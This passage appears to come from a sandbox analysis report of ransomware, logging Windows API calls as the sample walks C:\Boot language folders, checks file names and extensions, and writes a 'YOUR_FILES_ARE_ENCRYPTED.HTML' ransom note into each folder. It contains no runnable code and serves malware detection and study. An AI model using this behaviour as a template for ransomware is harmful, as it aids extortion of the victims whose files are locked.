lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x4506fa00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x4506fa00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x4506fa00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x4506fa00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xb0d7d660, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafdca9a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0155.030] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0155.030] lstrcmpW (lpString1="BCD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.030] PathFindExtensionW (pszPath="BCD") returned="" [0155.030] lstrlenW (lpString="") returned 0 [0155.030] PathFindExtensionW (pszPath="BCD") returned="" [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec57a620, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xafdca9a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0155.030] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0155.030] lstrcmpW (lpString1="BCD.LOG", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.030] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0155.030] lstrlenW (lpString=".LOG") returned 4 [0155.030] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec57a620, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec57a620, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0155.030] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0155.030] lstrcmpW (lpString1="BCD.LOG1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.030] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0155.030] lstrlenW (lpString=".LOG1") returned 5 [0155.030] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0155.031] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec57a620, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec57a620, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0155.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0155.031] lstrcmpW (lpString1="BCD.LOG2", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.031] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0155.031] lstrlenW (lpString=".LOG2") returned 5 [0155.031] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0155.031] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec508200, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec508200, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0155.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0155.031] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.031] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0155.031] lstrlenW (lpString=".DAT") returned 4 [0155.031] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0155.031] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f18da0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0155.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0155.031] GetProcessHeap () returned 0x270000 [0155.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.031] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\cs-CZ" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ") returned="\\\\?\\C:\\Boot\\cs-CZ" [0155.031] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\*") returned="\\\\?\\C:\\Boot\\cs-CZ\\*" [0155.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f18da0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.032] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f18da0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.032] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.032] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0155.032] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.032] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.032] lstrlenW (lpString=".mui") returned 4 [0155.032] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.032] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.033] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.033] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.033] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\cs-cz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.033] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.035] CloseHandle (hObject=0x4a4) returned 1 [0155.035] GetProcessHeap () returned 0x270000 [0155.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.037] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0155.037] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0155.037] GetProcessHeap () returned 0x270000 [0155.037] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.037] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\da-DK" | out: lpString1="\\\\?\\C:\\Boot\\da-DK") returned="\\\\?\\C:\\Boot\\da-DK" [0155.037] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\*") returned="\\\\?\\C:\\Boot\\da-DK\\*" [0155.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.038] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.038] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.038] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0155.038] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.038] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.038] lstrlenW (lpString=".mui") returned 4 [0155.038] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.038] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.038] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.038] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.038] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\da-dk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.039] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.041] CloseHandle (hObject=0x4a4) returned 1 [0155.041] GetProcessHeap () returned 0x270000 [0155.042] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.042] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0155.042] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0155.043] GetProcessHeap () returned 0x270000 [0155.043] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.043] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\de-DE" | out: lpString1="\\\\?\\C:\\Boot\\de-DE") returned="\\\\?\\C:\\Boot\\de-DE" [0155.043] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\*") returned="\\\\?\\C:\\Boot\\de-DE\\*" [0155.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.043] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0155.043] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.043] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.043] lstrlenW (lpString=".mui") returned 4 [0155.043] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.043] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.043] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.044] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\de-de\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.044] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.046] CloseHandle (hObject=0x4a4) returned 1 [0155.046] GetProcessHeap () returned 0x270000 [0155.048] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.048] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0155.048] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0155.048] GetProcessHeap () returned 0x270000 [0155.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.048] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\el-GR" | out: lpString1="\\\\?\\C:\\Boot\\el-GR") returned="\\\\?\\C:\\Boot\\el-GR" [0155.048] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\*") returned="\\\\?\\C:\\Boot\\el-GR\\*" [0155.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.049] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0155.049] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.049] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.049] lstrlenW (lpString=".mui") returned 4 [0155.049] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.049] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.049] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.050] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\el-gr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.050] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.052] CloseHandle (hObject=0x4a4) returned 1 [0155.052] GetProcessHeap () returned 0x270000 [0155.053] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: 